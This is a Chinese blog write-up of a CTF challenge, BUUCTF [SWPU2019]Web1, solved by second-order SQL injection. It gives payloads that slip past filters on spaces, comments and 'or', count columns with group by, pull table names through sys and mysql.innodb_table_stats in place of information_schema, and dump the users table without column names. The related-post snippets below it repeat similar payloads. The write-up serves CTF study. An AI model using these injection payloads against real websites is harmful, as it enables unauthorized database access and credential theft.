BUUCTF-[SWPU2019]Web1(bypass information_schema,无列名注入)

最新推荐文章于 2024-03-30 08:53:32 发布
最新推荐文章于 2024-03-30 08:53:32 发布
阅读量2k 收藏 3
点赞数 1
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104494654
版权

登录进去后,首先尝试了union注入,但是发现空格被过滤,于是使用/**/绕过。
在这里插入图片描述

然后判断列数,但是发现注释符被过滤了,无法使用,于是在SQL语句后加一个单引号闭合后面的语句limit 0,1;'

由于or被禁用,所以order by也无法使用,改为group by'/**/group/**/by/**/22,'

最后判断出列数有22列,回显位置为2和3.

title='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'&content=&ac=add

在这里插入图片描述

由于过滤or无法使用information_schema库,这里我根据题解又学会了information_schema的bypass。

使用sys库,来完成表名的查询sys.schema_auto_increment_columns

但是buuctf这里的环境好像有点不一样。。。显示这个表不存在,难道BUU改了下环境?

title='/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns/**/where/**/table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=&ac=add

在这里插入图片描述

然后看了看BUU的题解,用的是另外一个表mysql.innodb_table_stats,根据聊一聊bypass information_schema 这篇文章所说,现在网络上能搜索到的文章大部分都是利用innoDB引擎绕过对information_schema的过滤,但是mysql默认是关闭InnoDB存储引擎的,好吧,把这两个表都记住,以后都试试。

查表:

select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats

在这里插入图片描述

无列名注入:

title='/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述
总结:
1,information_schema的bypass:

  • sys.schema_auto_increment_columns

  • Mysql5.6及以上版本中 innodb_index_statsinnodb_table_stats这两个表中都包含所有新创建的数据库和表名

2,无列名注入:https://www.jianshu.com/p/6eba3370cfab

天问_Herbert555
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPU2019]Web1
weixin_45577185的博客
09-12 500
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
[SWPU 2019]ReverseMe
最新发布
2302_79135465的博客
05-04 304
第二个循环是将我们的输入([ecx+edi])与al("SWPU_2019_CTF")异或,异或后结果存储在ecx中,得到ecx=[第一个循环说是strcpy(al,"SWPU_2019_CTF")单步进opera3函数,但不知道都调到哪去了。异或 --> 最后与 eax 进行比较。程序运行思路就是:输入 --> 与。啊,还是感觉有点懵,不太懂得怎么看的。但是好像也没有对edx操作的地方。然后要搞清楚edx是怎么来的。en,那就只能从头动调了。不相等则跳转,退出程序。
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1585
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标题有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
[SWPU2019]Web1(sql)
wikey 的博客
03-30 949
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select/爆表名,这里不能使用or,所以这里使用的是新的payload。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
毕设&课设&项目&实训-SWPU数据库原理及应用大作业《西柚外卖订餐系统》基于Python+Flask+MySQL开发.zip
02-10
毕设&课设&项目&实训-本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
campus-recruitment-guidance:柚柚子帮校招指导服务平台,SWPU-2017级-码之泪殇毕业设计
04-01
整个平台包含微信小程序端和web 管理端两部分,项目开发采用前分割分离,这里是嵌入式项目工程,基于SpringBoot构造,对接为小程序提供数据接口服务。涉及的技术栈: SpringBoot->初步基础环境Shiro->安全框架JWT->...
精品-- FedCom为SWPU届本科毕业设计《基于社区检测的多任务聚类联邦学习》。本研究提出了一种多任务聚类联邦学.zip
02-05
《基于社区检测的多任务聚类联邦学习》是一项在SWPU届本科毕业设计中的创新性研究,该研究主要聚焦于联邦学习(Federated Learning)领域,并结合了社区检测(Community Detection)与多任务学习(Multi-task ...
Bypass information_schema
mi900709的博客
12-02 650
Bypass information_schema 前言 聊一聊mysql在被waf禁掉了information_schema库后还能有哪些利用思路,这个想法是前一段时间想到的,这次趁着安全客活动就在这里记录一下吧~ 实验环境 windows 2008 r2 phpstudy (mysql 5.7) 某waf(原因是该waf可以设置非法访问information_schema数据库) 前置任务 进行bypass之前先了解一下mysql中的information_schma这个库是干嘛的,在SQ
buuctf [SWPU2019]Web1 记录
SopRomeo的博客
03-14 1338
注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞 可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。 百度了web 发现广告栏存在sql注入… 学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。 我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧… 在title进行常规sql判...
SWPUCTF2019web题复现
bmth666的博客
04-05 1208
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 3634
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
BUUCTF [SWPU2019]Web1
qq_56313338的博客
08-27 257
这里将表命名为 x,并且第2个字段命名为a,第三个字段命名b。这是一道sql二次注入题目,但是注入点并不在登录处。获取当前数据库users表的第二列的所有数据。有很多列(我也不知道为啥这么多列…按照猜测,第三列因该就是密码了。admin的密码就是flag。广告申请处进行sql注入。你会发现过滤了很多关键字。就是查询第二列的所有数据。这里用到了一些绕过技巧。注册一个用户然后登录。
SWPUCTF2019 web1
zydbk123456的博客
04-26 350
#[SWPUCTF 2019] web1 1.登录页面 进来首先是个登录页面,一开始尝试用admin登录并用暴力破解得出密码,但是好像破解不出密码。 看到下面有个注册页面,点开注册一个账号就可以登录了。登录后,点开广告申请,发现有点不对劲。一开始看到文本框,想到了xss,试过几个xss payload,发现应该和xss无关。。。想到sql注入,但不知道怎么构造绕过的payload。看了网上大佬...
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值